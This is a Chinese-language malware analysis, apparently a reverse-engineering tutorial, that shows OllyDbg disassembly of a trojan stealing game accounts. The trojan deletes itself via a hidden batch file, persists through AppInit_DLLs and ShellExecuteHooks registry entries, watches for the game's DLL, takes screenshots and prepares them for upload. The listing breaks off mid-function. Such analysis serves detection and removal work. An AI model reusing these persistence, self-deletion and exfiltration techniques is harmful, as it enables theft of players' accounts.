004027C7|.E8 F4110000 call <jmp.&msvcrt.strlen> ; \strlen
004027CC|.59 pop ecx ; |
004027CD|.50 push eax ; |nBytesToWrite
004027CE|.8D85 F0FAFFFF lea eax, dword ptr ; |
004027D4|.50 push eax ; |Buffer
004027D5|.56 push esi ; |hFile
004027D6|.FF15 08414000 call dword ptr [<&kernel32.WriteFil>; \写入批处理的内容
004027DC|.56 push esi ; /hObject
004027DD|.FF15 0C414000 call dword ptr [<&kernel32.CloseHan>; \CloseHandle
004027E3|.8D85 F8FEFFFF lea eax, dword ptr
004027E9|.68 03010000 push 0x103 ; /BufSize = 103 (259.)
004027EE|.50 push eax ; |Buffer
004027EF|.68 A0594000 push 004059A0 ; |comspec
004027F4|.FF15 90404000 call dword ptr [<&kernel32.GetEnvir>; \GetEnvironmentVariableA
004027FA|.8D85 F8FEFFFF lea eax, dword ptr
00402800|.68 98594000 push 00405998 ; / /c
00402805|.50 push eax ; |dest
00402806|.E8 CD110000 call <jmp.&msvcrt._mbscat> ; \strcat
0040280B|.8D85 F0FCFFFF lea eax, dword ptr
00402811|.50 push eax ; /src
00402812|.8D85 F8FEFFFF lea eax, dword ptr ; |
00402818|.50 push eax ; |dest
00402819|.E8 BA110000 call <jmp.&msvcrt._mbscat> ; \strcat
0040281E|.83C4 10 add esp, 0x10
00402821|.8D85 F8FEFFFF lea eax, dword ptr
00402827|.57 push edi ; /ShowState
00402828|.50 push eax ; |CmdLine
00402829|.FF15 8C404000 call dword ptr [<&kernel32.WinExec>>; \构造好批处理的目录和命令行,执行批处理。
看堆栈:
0012FA98 0012FEB4|CmdLine = "C:\WINDOWS\system32\cmd.exe /c c:\del1237519.bat"
0012FA9C 00000000\ShowState = SW_HIDE
呵呵,这里是最常用的应用程序删除自身的手法……
}00401EE3 6A 00 push 0x0
00401EE5 FF15 58404000 call dword ptr [<&kernel32.ExitProcess>] ; kernel32.ExitProcess到现在,我们第一步分析完成了,整理一下我们现在的收获:
一、文件操作方面: 1:这个程序的主要文件目录是:C:\WINDOWS\Fonts\
2:将EXE文件改名为DLL名字,大概模样是:"kb本地时间数字字符.dll",并拷贝到上面的目录中。
3:有一个名字为:C:\WINDOWS\Fonts\AeioFs.dat的配置文件记录了DLL的名字和ID。
4:C:\WINDOWS\Fonts\Encionc_ch.dat 记录发送目标的网址等信息。
5:C:\WINDOWS\Fonts\DNSRicip.dat 记录截取图片的路径
6:这个程序要删除一个补丁程序:verclsid.exe。
7:通过一个批处理删除了自身。二、注册表操作方面: 1、通过修改注册表键:”HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_Dlls"的内容为自己是释放的DLL文件路径,来让操作系统自动载入此木马文件。
2、修改”HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9B1AE382-2647-4c4a-A313-B36B6CA34BD7}\InprocServer32"的内容为自己的DLL路径
3、修改”HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shellexecutehooks"为自己的CLSID。
好,到现在,我们已经知道如何来清楚这个病毒了,或者实在无聊写一个清理工具也不错的。
出于好奇也为了保证此这个文章的完整性,现在我们看一下这个程序通过DLL方式运行的话,如果这个程序以DLL的方式注入的话,那应该做的就是我们要分析的后两项:
2:这个程序主要是针对什么,怎么做的操作(已经知道是梦幻的盗号木马,主要是分析怎么窃取到号码的)
3:将窃取到的信息怎么发送回去的,发送的目标是哪里。
我们猜测一下,可以知道,如果这个程序以DLL方式运行的话,那实践的功能应该就是监视信息,获取信息,发送信息。
我们先用OD的关键字看下:00401071/$55 push ebp ;1
00401072|.8BEC mov ebp, esp
00401074|.81EC 84000000 sub esp, 0x84
0040107A|.53 push ebx
0040107B|.56 push esi
0040107C|.57 push edi
0040107D|.FF15 8C414000 call dword ptr [<&user32.GetDesktopWi>; [GetDesktopWindow
00401083|.85C0 test eax, eax
00401085|.74 56 je short 004010DD
00401087|.8B3D 7C414000 mov edi, dword ptr [<&user32.GetWind>;user32.GetWindow
0040108D|.6A 05 push 0x5 ; /Relation = GW_CHILD
0040108F|.50 push eax ; |hWnd
00401090|.FFD7 call edi ; \GetWindow
00401092|.8BF0 mov esi, eax
00401094|.85F6 test esi, esi
00401096|.74 45 je short 004010DD
00401098|.FF15 14414000 call dword ptr [<&kernel32.GetCurrent>; [GetCurrentProcessId
0040109E|.8BD8 mov ebx, eax
004010A0|>6A 02 /push 0x2
004010A2|.56 |push esi
004010A3|.FFD7 |call edi
004010A5|.8BF0 |mov esi, eax
004010A7|.8D45 FC |lea eax, dword ptr
004010AA|.50 |push eax ; /pProcessID
004010AB|.56 |push esi ; |hWnd
004010AC|.FF15 80414000 |call dword ptr [<&user32.GetWindowTh>; \GetWindowThreadProcessId
004010B2|.395D FC |cmp dword ptr , ebx
004010B5|.75 22 |jnz short 004010D9
004010B7|.8D45 BC |lea eax, dword ptr
004010BA|.6A 3F |push 0x3F ; /Count = 3F (63.)
004010BC|.50 |push eax ; |Buffer
004010BD|.56 |push esi ; |hWnd
004010BE|.FF15 88414000 |call dword ptr [<&user32.GetClassNam>; \GetClassNameA
004010C4|.8D45 BC |lea eax, dword ptr ;取到的窗口类型
004010C7|.68 F0564000 |push 004056F0 ; /wsgame
004010CC|.50 |push eax ; |s1
004010CD|.FF15 3C414000 |call dword ptr [<&msvcrt._strcmpi>]; \_stricmp
004010D3|.59 |pop ecx ;判断是不是梦幻西游
004010D4|.85C0 |test eax, eax
004010D6|.59 |pop ecx
004010D7|.74 0B |je short 004010E4
004010D9|>85F6 |test esi, esi
004010DB|.^ 75 C3 \jnz short 004010A0
004010DD|>33C0 xor eax, eax
004010DF|.E9 DF000000 jmp 004011C3
004010E4|>8D85 7CFFFFFF lea eax, dword ptr 下载代码是检测是否加载DLL,应该是用来确定时机的吧:004019B1 .53 push ebx
004019B2 .55 push ebp
004019B3 .56 push esi
004019B4 .BB 5C574000 mov ebx, 0040575C ;mhmain.dll
004019B9 .57 push edi
004019BA .8B3D E4404000 mov edi, dword ptr [<&kernel32.GetMo>;kernel32.GetModuleHandleA
004019C0 .53 push ebx ; /pModule => "mhmain.dll"
004019C1 .FFD7 call edi ; \GetModuleHandleA
004019C3 .8B2D E8404000 mov ebp, dword ptr [<&kernel32.Sleep>;kernel32.Sleep
004019C9 .8BF0 mov esi, eax ;这里应该是监控 mhmain.dll 是否加载了(是否是活动状态。)
004019CB .85F6 test esi, esi
004019CD .75 10 jnz short 004019DF
004019CF >68 E8030000 push 0x3E8
004019D4 .FFD5 call ebp
004019D6 .53 push ebx
004019D7 .FFD7 call edi
004019D9 .8BF0 mov esi, eax
004019DB .85F6 test esi, esi
004019DD .^ 74 F0 je short 004019CF再看另一段代码:0040148D /75 66 jnz short 004014F5
0040148F |53 push ebx
00401490 |BB AC624000 mov ebx, 004062AC
00401495 |57 push edi
00401496 |BE 8C634000 mov esi, 0040638C
0040149B |53 push ebx
0040149C |56 push esi
0040149D |E8 2A250000 call <jmp.&msvcrt._mbscpy>
004014A2 |68 24574000 push 00405724 ; .bmp
004014A7 |56 push esi
004014A8 |E8 2B250000 call <jmp.&msvcrt._mbscat>
004014AD |83C4 10 add esp, 0x10
004014B0 |BF 18574000 mov edi, 00405718 ; tmpimg.bmp
004014B5 |57 push edi
004014B6 |FF15 8C414000 call dword ptr [<&user32.GetDesktopWi>; user32.GetDesktopWindow
004014BC |50 push eax
004014BD |E8 5D150000 call 00402A1F
{
00402A29 68 80000000 push 0x80
00402A2E 6A 02 push 0x2
00402A30 53 push ebx
00402A31 53 push ebx
00402A32 68 00000040 push 0x40000000
00402A37 FF75 0C push dword ptr
00402A3A FF15 00414000 call dword ptr [<&kernel32.CreateFile>; kernel32.CreateFileA
00402A40 83F8 FF cmp eax, -0x1
00402A43 8945 F8 mov dword ptr , eax
00402A46 75 07 jnz short 00402A4F
00402A48 33C0 xor eax, eax
00402A4A E9 96020000 jmp 00402CE5
00402A4F 395D 08 cmp dword ptr , ebx
00402A52 56 push esi
00402A53 57 push edi
00402A54 75 12 jnz short 00402A68
00402A56 8B35 6C414000 mov esi, dword ptr [<&user32.GetSyst>; user32.GetSystemMetrics
00402A5C 53 push ebx
00402A5D FFD6 call esi
00402A5F 6A 01 push 0x1
00402A61 8945 F4 mov dword ptr , eax
00402A64 FFD6 call esi
00402A66 EB 1C jmp short 00402A84
00402A68 8D45 B0 lea eax, dword ptr
00402A6B 50 push eax
00402A6C FF75 08 push dword ptr
00402A6F FF15 70414000 call dword ptr [<&user32.GetClientRec>; user32.GetClientRect
00402A75 8B45 B8 mov eax, dword ptr
00402A78 2B45 B0 sub eax, dword ptr
00402A7B 8945 F4 mov dword ptr , eax
00402A7E 8B45 BC mov eax, dword ptr
00402A81 2B45 B4 sub eax, dword ptr
00402A84 FF75 08 push dword ptr
00402A87 8945 FC mov dword ptr , eax
00402A8A FF15 74414000 call dword ptr [<&user32.GetDC>] ; user32.GetDC
00402A90 8BF8 mov edi, eax
00402A92 57 push edi
00402A93 897D 0C mov dword ptr , edi
00402A96 FF15 50404000 call dword ptr [<&gdi32.CreateCompati>; gdi32.CreateCompatibleDC
00402A9C FF75 FC push dword ptr
00402A9F 8B35 4C404000 mov esi, dword ptr [<&gdi32.CreateCo>; gdi32.CreateCompatibleBitmap
00402AA5 8945 E8 mov dword ptr , eax
00402AA8 FF75 F4 push dword ptr
00402AAB 57 push edi
00402AAC FFD6 call esi
00402AAE 6A 08 push 0x8
00402AB0 6A 08 push 0x8
00402AB2 57 push edi
00402AB3 8945 EC mov dword ptr , eax
00402AB6 FFD6 call esi
00402AB8 68 2C040000 push 0x42C
00402ABD 6A 42 push 0x42
00402ABF 8945 D8 mov dword ptr , eax
00402AC2 FF15 EC404000 call dword ptr [<&kernel32.GlobalAllo>; kernel32.GlobalAlloc
00402AC8 50 push eax
00402AC9 8945 D0 mov dword ptr , eax
00402ACC FF15 F0404000 call dword ptr [<&kernel32.GlobalLock>; kernel32.GlobalLock
00402AD2 FF75 EC push dword ptr
00402AD5 8B3D 48404000 mov edi, dword ptr [<&gdi32.SelectOb>; gdi32.SelectObject
00402ADB 8BF0 mov esi, eax
00402ADD FF75 E8 push dword ptr
00402AE0 FFD7 call edi
00402AE2 68 2000CC00 push 0xCC0020
00402AE7 53 push ebx
00402AE8 53 push ebx
00402AE9 FF75 0C push dword ptr
00402AEC FF75 FC push dword ptr
00402AEF FF75 F4 push dword ptr
00402AF2 53 push ebx
00402AF3 53 push ebx
00402AF4 FF75 E8 push dword ptr
00402AF7 FF15 44404000 call dword ptr [<&gdi32.BitBlt>] ; gdi32.BitBlt
00402AFD FF75 D8 push dword ptr
00402B00 FF75 E8 push dword ptr
00402B03 FFD7 call edi
00402B05 6A 2C push 0x2C
00402B07 53 push ebx
00402B08 56 push esi
00402B09 E8 020F0000 call <jmp.&msvcrt.memset>
00402B0E 8B45 F4 mov eax, dword ptr
00402B11 8B3D 40404000 mov edi, dword ptr [<&gdi32.GetDevic>; gdi32.GetDeviceCaps
00402B17 83C4 0C add esp, 0xC
00402B1A 8946 04 mov dword ptr , eax
00402B1D 8B45 FC mov eax, dword ptr
00402B20 C706 28000000 mov dword ptr , 0x28
00402B26 6A 0C push 0xC
00402B28 8946 08 mov dword ptr , eax
00402B2B FF75 0C push dword ptr
00402B2E 66:C746 0C 0100 mov word ptr , 0x1
00402B34 FFD7 call edi
00402B36 53 push ebx
00402B37 56 push esi
00402B38 53 push ebx
00402B39 66:8946 0E mov word ptr , ax
00402B3D FF75 FC push dword ptr
00402B40 895E 10 mov dword ptr , ebx
00402B43 53 push ebx
00402B44 FF75 EC push dword ptr
00402B47 FF75 0C push dword ptr
00402B4A FF15 3C404000 call dword ptr [<&gdi32.GetDIBits>] ; gdi32.GetDIBits
00402B50 395E 14 cmp dword ptr , ebx
00402B53 75 1A jnz short 00402B6F
00402B55 0FB746 0E movzx eax, word ptr
00402B59 0FAF46 04 imul eax, dword ptr
00402B5D 83C0 1F add eax, 0x1F
00402B60 6A 08 push 0x8
00402B62 24 E0 and al, 0xE0
00402B64 59 pop ecx
00402B65 99 cdq
00402B66 F7F9 idiv ecx
00402B68 0FAF46 08 imul eax, dword ptr
00402B6C 8946 14 mov dword ptr , eax
00402B6F 6A 68 push 0x68
00402B71 FF75 0C push dword ptr
00402B74 FFD7 call edi
00402B76 8B4E 14 mov ecx, dword ptr
00402B79 8945 F4 mov dword ptr , eax
00402B7C 8D0485 36000000 lea eax, dword ptr
00402B83 8B3D 08414000 mov edi, dword ptr [<&kernel32.Write>; kernel32.WriteFile
00402B89 8945 CA mov dword ptr , eax
00402B8C 03C1 add eax, ecx
00402B8E 8945 C2 mov dword ptr , eax
00402B91 8D45 E4 lea eax, dword ptr
00402B94 53 push ebx
00402B95 50 push eax
00402B96 8D45 C0 lea eax, dword ptr
00402B99 6A 0E push 0xE
00402B9B 50 push eax
00402B9C 894D D4 mov dword ptr , ecx
00402B9F FF75 F8 push dword ptr
00402BA2 66:C745 C0 424D mov word ptr , 0x4D42
00402BA8 66:895D C6 mov word ptr , bx
00402BAC 66:895D C8 mov word ptr , bx
00402BB0 FFD7 call edi
00402BB2 8D45 E4 lea eax, dword ptr
00402BB5 53 push ebx
00402BB6 50 push eax
00402BB7 6A 28 push 0x28
00402BB9 56 push esi
00402BBA FF75 F8 push dword ptr
00402BBD FFD7 call edi
00402BBF 8B45 F4 mov eax, dword ptr
00402BC2 3BC3 cmp eax, ebx
00402BC4 0F84 8F000000 je 00402C59
00402BCA 8D0485 08000000 lea eax, dword ptr
00402BD1 50 push eax
00402BD2 6A 42 push 0x42
00402BD4 FF15 EC404000 call dword ptr [<&kernel32.GlobalAllo>; kernel32.GlobalAlloc
00402BDA 50 push eax
00402BDB 8945 DC mov dword ptr , eax
00402BDE FF15 F0404000 call dword ptr [<&kernel32.GlobalLock>; kernel32.GlobalLock
00402BE4 8B4D F4 mov ecx, dword ptr
00402BE7 8945 E0 mov dword ptr , eax
00402BEA 66:8948 02 mov word ptr , cx
00402BEE 66:C700 0003 mov word ptr , 0x300
00402BF3 83C0 04 add eax, 0x4
00402BF6 50 push eax
00402BF7 51 push ecx
00402BF8 53 push ebx
00402BF9 FF75 0C push dword ptr
00402BFC FF15 38404000 call dword ptr [<&gdi32.GetSystemPale>; gdi32.GetSystemPaletteEntries
00402C02 8B4D F4 mov ecx, dword ptr
00402C05 885D F3 mov byte ptr , bl
00402C08 3BCB cmp ecx, ebx
00402C0A 7E 3B jle short 00402C47
00402C0C 8B45 E0 mov eax, dword ptr
00402C0F 894D E0 mov dword ptr , ecx
00402C12 83C0 05 add eax, 0x5
00402C15 8945 F4 mov dword ptr , eax
00402C18 EB 03 jmp short 00402C1D
00402C1A 8B45 F4 /mov eax, dword ptr
00402C1D 8A48 FF mov cl, byte ptr
00402C20 53 |push ebx
00402C21 884D F2 |mov byte ptr , cl
00402C24 8A08 |mov cl, byte ptr
00402C26 884D F1 |mov byte ptr , cl
00402C29 8A40 01 |mov al, byte ptr
00402C2C 8845 F0 |mov byte ptr , al
00402C2F 8D45 E4 |lea eax, dword ptr
00402C32 50 |push eax
00402C33 8D45 F0 |lea eax, dword ptr
00402C36 6A 04 |push 0x4
00402C38 50 |push eax
00402C39 FF75 F8 |push dword ptr
00402C3C FFD7 |call edi
00402C3E 8345 F4 04 |add dword ptr , 0x4
00402C42 FF4D E0 |dec dword ptr
00402C45^ 75 D3 \jnz short 00402C1A
00402C47 FF75 DC push dword ptr
00402C4A FF15 A4404000 call dword ptr [<&kernel32.GlobalUnlo>; kernel32.GlobalUnlock
00402C50 FF75 DC push dword ptr
00402C53 FF15 A0404000 call dword ptr [<&kernel32.GlobalFree>; kernel32.GlobalFree
00402C59 FF76 14 push dword ptr
00402C5C 6A 42 push 0x42
00402C5E FF15 EC404000 call dword ptr [<&kernel32.GlobalAllo>; kernel32.GlobalAlloc
00402C64 50 push eax
00402C65 8945 DC mov dword ptr , eax
00402C68 FF15 F0404000 call dword ptr [<&kernel32.GlobalLock>; kernel32.GlobalLock
00402C6E 53 push ebx
00402C6F 56 push esi
00402C70 50 push eax
00402C71 8945 E0 mov dword ptr , eax
00402C74 FF75 FC push dword ptr
00402C77 53 push ebx
00402C78 FF75 EC push dword ptr
00402C7B FF75 0C push dword ptr
00402C7E FF15 3C404000 call dword ptr [<&gdi32.GetDIBits>] ; gdi32.GetDIBits
00402C84 8D45 E4 lea eax, dword ptr
00402C87 53 push ebx
00402C88 50 push eax
00402C89 FF75 D4 push dword ptr
00402C8C FF75 E0 push dword ptr
00402C8F FF75 F8 push dword ptr
00402C92 FFD7 call edi
00402C94 FF75 DC push dword ptr
00402C97 8B3D A4404000 mov edi, dword ptr [<&kernel32.Globa>; kernel32.GlobalUnlock
00402C9D FFD7 call edi
00402C9F FF75 DC push dword ptr
00402CA2 8B1D A0404000 mov ebx, dword ptr [<&kernel32.Globa>; kernel32.GlobalFree
00402CA8 FFD3 call ebx
00402CAA 56 push esi
00402CAB FFD7 call edi
00402CAD FF75 D0 push dword ptr
00402CB0 FFD3 call ebx
00402CB2 FF75 D8 push dword ptr
00402CB5 8B35 34404000 mov esi, dword ptr [<&gdi32.DeleteOb>; gdi32.DeleteObject
00402CBB FFD6 call esi
00402CBD FF75 EC push dword ptr
00402CC0 FFD6 call esi
00402CC2 FF75 E8 push dword ptr
00402CC5 FF15 30404000 call dword ptr [<&gdi32.DeleteDC>] ; gdi32.DeleteDC
00402CCB FF75 0C push dword ptr
00402CCE FF75 08 push dword ptr
00402CD1 FF15 78414000 call dword ptr [<&user32.ReleaseDC>]; user32.ReleaseDC
00402CD7 FF75 F8 push dword ptr
00402CDA FF15 0C414000 call dword ptr [<&kernel32.CloseHandl>; kernel32.CloseHandle
00402CE0 6A 01 push 0x1
00402CE2 58 pop eax
00402CE3 5F pop edi
00402CE4 5E pop esi
00402CE5 5B pop ebx
00402CE6 C9 leave
00402CE7 C2 0800 retn 0x8
这段截图的代码在网上传的很火的,比如:http://blog.sina.com.cn/s/blog_55eccf2101009ojy.html
}
004014C2 |68 00574000 push 00405700 ; image/jpeg
004014C7 |56 push esi
004014C8 |57 push edi
004014C9 |E8 F71E0000 call 004033C5
{
004033C5 55 push ebp
004033C6 8BEC mov ebp, esp
004033C8 81EC 58040000 sub esp, 0x458
004033CE 53 push ebx
004033CF 56 push esi
004033D0 57 push edi
004033D1 68 AC5A4000 push 00405AAC ; ASCII "gdiplus.dll"
004033D6 FF15 D4404000 call dword ptr [<&kernel32.LoadLibrar>; kernel32.LoadLibraryA
004033DC 8BF8 mov edi, eax
004033DE 33DB xor ebx, ebx
004033E0 3BFB cmp edi, ebx
004033E2 0F84 96000000 je 0040347E
004033E8 8B35 B4404000 mov esi, dword ptr [<&kernel32.GetPr>; kernel32.GetProcAddress
004033EE 68 9C5A4000 push 00405A9C ; ASCII "GdiplusStartup"
004033F3 57 push edi
004033F4 FFD6 call esi
004033F6 68 805A4000 push 00405A80 ; ASCII "GdipGetImageEncodersSize"
004033FB 57 push edi
004033FC 8945 F4 mov dword ptr , eax
004033FF FFD6 call esi
00403401 68 685A4000 push 00405A68 ; ASCII "GdipGetImageEncoders"
00403406 57 push edi
00403407 8945 FC mov dword ptr , eax
0040340A FFD6 call esi
0040340C 68 505A4000 push 00405A50 ; ASCII "GdipLoadImageFromFile"
00403411 57 push edi
00403412 8945 DC mov dword ptr , eax
00403415 FFD6 call esi
00403417 68 3C5A4000 push 00405A3C ; ASCII "GdipSaveImageToFile"
0040341C 57 push edi
0040341D 8945 E8 mov dword ptr , eax
00403420 FFD6 call esi
00403422 68 285A4000 push 00405A28 ; ASCII "GdipDisposeImage"
00403427 57 push edi
00403428 8945 E4 mov dword ptr , eax
0040342B FFD6 call esi
0040342D 8945 E0 mov dword ptr , eax
00403430 8D45 CC lea eax, dword ptr
00403433 53 push ebx
00403434 50 push eax
00403435 8D45 C8 lea eax, dword ptr
00403438 895D F0 mov dword ptr , ebx
0040343B 50 push eax
0040343C 895D F8 mov dword ptr , ebx
0040343F C745 CC 0100000>mov dword ptr , 0x1
00403446 895D D0 mov dword ptr , ebx
00403449 895D D4 mov dword ptr , ebx
0040344C 895D D8 mov dword ptr , ebx
0040344F FF55 F4 call dword ptr
00403452 8D45 F8 lea eax, dword ptr
00403455 50 push eax
00403456 8D45 F0 lea eax, dword ptr
00403459 50 push eax
0040345A FF55 FC call dword ptr
0040345D 395D F8 cmp dword ptr , ebx
00403460 74 1C je short 0040347E
00403462 6A 04 push 0x4
00403464 68 00100000 push 0x1000
00403469 FF75 F8 push dword ptr
0040346C 53 push ebx
0040346D 6A FF push -0x1
0040346F FF15 88404000 call dword ptr [<&kernel32.VirtualAll>; kernel32.VirtualAllocEx
00403475 8BF8 mov edi, eax
00403477 3BFB cmp edi, ebx
00403479 897D F4 mov dword ptr , edi
0040347C 75 07 jnz short 00403485
0040347E 33C0 xor eax, eax
00403480 E9 02010000 jmp 00403587
00403485 57 push edi
00403486 FF75 F8 push dword ptr
00403489 FF75 F0 push dword ptr
0040348C FF55 DC call dword ptr
0040348F 395D F0 cmp dword ptr , ebx
00403492 895D FC mov dword ptr , ebx
00403495 76 37 jbe short 004034CE
00403497 8D77 30 lea esi, dword ptr
0040349A FF75 10 /push dword ptr
0040349D FF36 |push dword ptr
0040349F FF15 30414000 |call dword ptr [<&msvcrt.wcscmp>] ; msvcrt.wcscmp
004034A5 59 |pop ecx
004034A6 85C0 |test eax, eax
004034A8 59 |pop ecx
004034A9 74 10 |je short 004034BB
004034AB FF45 FC |inc dword ptr
004034AE 83C6 4C |add esi, 0x4C
004034B1 8B45 FC |mov eax, dword ptr
004034B4 3B45 F0 |cmp eax, dword ptr
004034B7^ 72 E1 \jb short 0040349A
004034B9 EB 13 jmp short 004034CE
004034BB 8B75 FC mov esi, dword ptr
004034BE 8D7D B8 lea edi, dword ptr
004034C1 6BF6 4C imul esi, esi, 0x4C
004034C4 0375 F4 add esi, dword ptr
004034C7 A5 movs dword ptr es:, dword ptr [e>
004034C8 A5 movs dword ptr es:, dword ptr [e>
004034C9 A5 movs dword ptr es:, dword ptr [e>
004034CA A5 movs dword ptr es:, dword ptr [e>
004034CB 8B7D F4 mov edi, dword ptr
004034CE 68 00400000 push 0x4000
004034D3 FF75 F8 push dword ptr
004034D6 57 push edi
004034D7 6A FF push -0x1
004034D9 FF15 A8404000 call dword ptr [<&kernel32.VirtualFre>; kernel32.VirtualFreeEx
004034DF 66:A1 C8654000mov ax, word ptr
004034E5 B9 81000000 mov ecx, 0x81
004034EA 66:8985 B0FDFFF>mov word ptr , ax
004034F1 33C0 xor eax, eax
004034F3 8DBD B2FDFFFF lea edi, dword ptr
004034F9 68 04010000 push 0x104
004034FE F3:AB rep stos dword ptr es:
00403500 66:AB stos word ptr es:
00403502 8D85 B0FDFFFF lea eax, dword ptr
00403508 50 push eax
00403509 FF75 08 push dword ptr
0040350C E8 AF040000 call <jmp.&msvcrt.strlen>
00403511 59 pop ecx
00403512 8B35 B0404000 mov esi, dword ptr [<&kernel32.Multi>; kernel32.MultiByteToWideChar
00403518 50 push eax
00403519 FF75 08 push dword ptr
0040351C 53 push ebx
0040351D 53 push ebx
0040351E FFD6 call esi
00403520 66:A1 C8654000mov ax, word ptr
00403526 B9 81000000 mov ecx, 0x81
0040352B 66:8985 A8FBFFF>mov word ptr , ax
00403532 33C0 xor eax, eax
00403534 8DBD AAFBFFFF lea edi, dword ptr
0040353A 68 04010000 push 0x104
0040353F F3:AB rep stos dword ptr es:
00403541 66:AB stos word ptr es:
00403543 8D85 A8FBFFFF lea eax, dword ptr
00403549 50 push eax
0040354A FF75 0C push dword ptr
0040354D E8 6E040000 call <jmp.&msvcrt.strlen>
00403552 59 pop ecx
00403553 50 push eax
00403554 FF75 0C push dword ptr
00403557 53 push ebx
00403558 53 push ebx
00403559 FFD6 call esi
0040355B 8D45 EC lea eax, dword ptr
0040355E 895D EC mov dword ptr , ebx
00403561 50 push eax
00403562 8D85 B0FDFFFF lea eax, dword ptr
00403568 50 push eax
00403569 FF55 E8 call dword ptr
0040356C 8D45 B8 lea eax, dword ptr
0040356F 53 push ebx
00403570 50 push eax
00403571 8D85 A8FBFFFF lea eax, dword ptr
00403577 50 push eax
00403578 FF75 EC push dword ptr
0040357B FF55 E4 call dword ptr
0040357E FF75 EC push dword ptr
00403581 FF55 E0 call dword ptr
00403584 6A 01 push 0x1
00403586 58 pop eax
00403587 5F pop edi
00403588 5E pop esi
00403589 5B pop ebx
0040358A C9 leave
0040358B C2 0C00 retn 0xC
取到GDI相关的API,还是处理图像了。
}
好了不看这些无聊的了,看一下它网络连接的部分:
创建上传数据用的内存映射文件:0040233A 55 push ebp
0040233B 8BEC mov ebp, esp
0040233D B8 C8180000 mov eax, 0x18C8
00402342 E8 99160000 call 004039E0
00402347 A0 74644000 mov al, byte ptr
0040234C 53 push ebx
0040234D 56 push esi
0040234E 57 push edi
0040234F 8885 38E7FFFF mov byte ptr , al
00402355 B9 FF040000 mov ecx, 0x4FF
0040235A 33C0 xor eax, eax
0040235C 8DBD 39E7FFFF lea edi, dword ptr
00402362 F3:AB rep stos dword ptr es:
00402364 66:AB stos word ptr es:
00402366 AA stos byte ptr es:
00402367 8D85 38E7FFFF lea eax, dword ptr
0040236D 50 push eax
0040236E 8D85 38FFFFFF lea eax, dword ptr
00402374 50 push eax
00402375 FF75 08 push dword ptr
00402378 E8 37050000 call 004028B4
0040237D 33DB xor ebx, ebx
0040237F 8945 FC mov dword ptr , eax
00402382 3BC3 cmp eax, ebx
00402384 0F84 10010000 je 0040249A
0040238A 6A 5C push 0x5C
0040238C FF75 0C push dword ptr
0040238F FF15 24414000 call dword ptr [<&msvcrt.strrchr>] ; msvcrt.strrchr
00402395 59 pop ecx
00402396 3BC3 cmp eax, ebx
00402398 59 pop ecx
00402399 74 03 je short 0040239E
0040239B 40 inc eax
0040239C EB 03 jmp short 004023A1
0040239E 8B45 0C mov eax, dword ptr
004023A1 50 push eax
004023A2 8D85 38FBFFFF lea eax, dword ptr
004023A8 68 74584000 push 00405874 ; fileupload\n\ncontent-disposition: form-data; name="file1"; filename="%s"\n\ncontent-type: image/bmp\n\n\n\n
004023AD 50 push eax
004023AE FF15 28414000 call dword ptr [<&msvcrt.sprintf>] ; msvcrt.sprintf
004023B4 BE 60584000 mov esi, 00405860 ; \n\nfileupload--\n\n
004023B9 8D7D D8 lea edi, dword ptr
004023BC A5 movs dword ptr es:, dword ptr [e>
004023BD A5 movs dword ptr es:, dword ptr [e>
004023BE A5 movs dword ptr es:, dword ptr [e>
004023BF A5 movs dword ptr es:, dword ptr [e>
004023C0 6A 08 push 0x8
004023C2 8D45 C1 lea eax, dword ptr
004023C5 59 pop ecx
004023C6 FF75 18 push dword ptr
004023C9 A4 movs byte ptr es:, byte ptr [esi>
004023CA BE 40584000 mov esi, 00405840 ; referer:
004023CF 8D7D B8 lea edi, dword ptr
004023D2 F3:A5 rep movs dword ptr es:, dword p>
004023D4 50 push eax
004023D5 E8 F2150000 call <jmp.&msvcrt._mbscpy>
004023DA 83C4 14 add esp, 0x14
004023DD 8D45 B8 lea eax, dword ptr
004023E0 C745 F0 0858400>mov dword ptr , 00405808 ; content-type: multipart/form-data;boundary=fileupload
004023E7 8945 F4 mov dword ptr , eax
004023EA 53 push ebx
004023EB 53 push ebx
004023EC 6A 03 push 0x3
004023EE 53 push ebx
004023EF 6A 01 push 0x1
004023F1 68 00000080 push 0x80000000
004023F6 FF75 0C push dword ptr
004023F9 895D 18 mov dword ptr , ebx
004023FC FF15 00414000 call dword ptr [<&kernel32.CreateFile>; kernel32.CreateFileA
00402402 83F8 FF cmp eax, -0x1
00402405 8945 08 mov dword ptr , eax
00402408 0F84 8C000000 je 0040249A
0040240E 53 push ebx
0040240F 50 push eax
00402410 FF15 F8404000 call dword ptr [<&kernel32.GetFileSiz>; kernel32.GetFileSize
00402416 8945 0C mov dword ptr , eax
00402419 8D85 38FBFFFF lea eax, dword ptr
0040241F 50 push eax
00402420 E8 9B150000 call <jmp.&msvcrt.strlen>
00402425 8BF8 mov edi, eax
00402427 8D45 D8 lea eax, dword ptr
0040242A 50 push eax
0040242B E8 90150000 call <jmp.&msvcrt.strlen>
00402430 59 pop ecx
00402431 8D3438 lea esi, dword ptr
00402434 0375 0C add esi, dword ptr
00402437 59 pop ecx
00402438 6A 04 push 0x4
0040243A 68 00100000 push 0x1000
0040243F 56 push esi
00402440 53 push ebx
00402441 6A FF push -0x1
00402443 8945 F8 mov dword ptr , eax
00402446 FF15 88404000 call dword ptr [<&kernel32.VirtualAll>; kernel32.VirtualAllocEx
0040244C 8BD8 mov ebx, eax
0040244E 85DB test ebx, ebx
00402450 74 3B je short 0040248D
00402452 8D85 38FBFFFF lea eax, dword ptr
00402458 57 push edi
00402459 50 push eax
0040245A 53 push ebx
0040245B E8 66150000 call <jmp.&msvcrt.memcpy>
00402460 83C4 0C add esp, 0xC
00402463 8D45 EC lea eax, dword ptr
00402466 03FB add edi, ebx
00402468 6A 00 push 0x0
0040246A 50 push eax
0040246B FF75 0C push dword ptr
0040246E 57 push edi
0040246F FF75 08 push dword ptr
00402472 FF15 FC404000 call dword ptr [<&kernel32.ReadFile>] ; kernel32.ReadFile
00402478 FF75 F8 push dword ptr
0040247B 8D45 D8 lea eax, dword ptr
0040247E 50 push eax
0040247F 8B45 0C mov eax, dword ptr
00402482 03F8 add edi, eax
00402484 57 push edi
00402485 E8 3C150000 call <jmp.&msvcrt.memcpy>
0040248A 83C4 0C add esp, 0xC
0040248D FF75 08 push dword ptr
00402490 FF15 0C414000 call dword ptr [<&kernel32.CloseHandl>; kernel32.CloseHandle
00402496 85DB test ebx, ebx
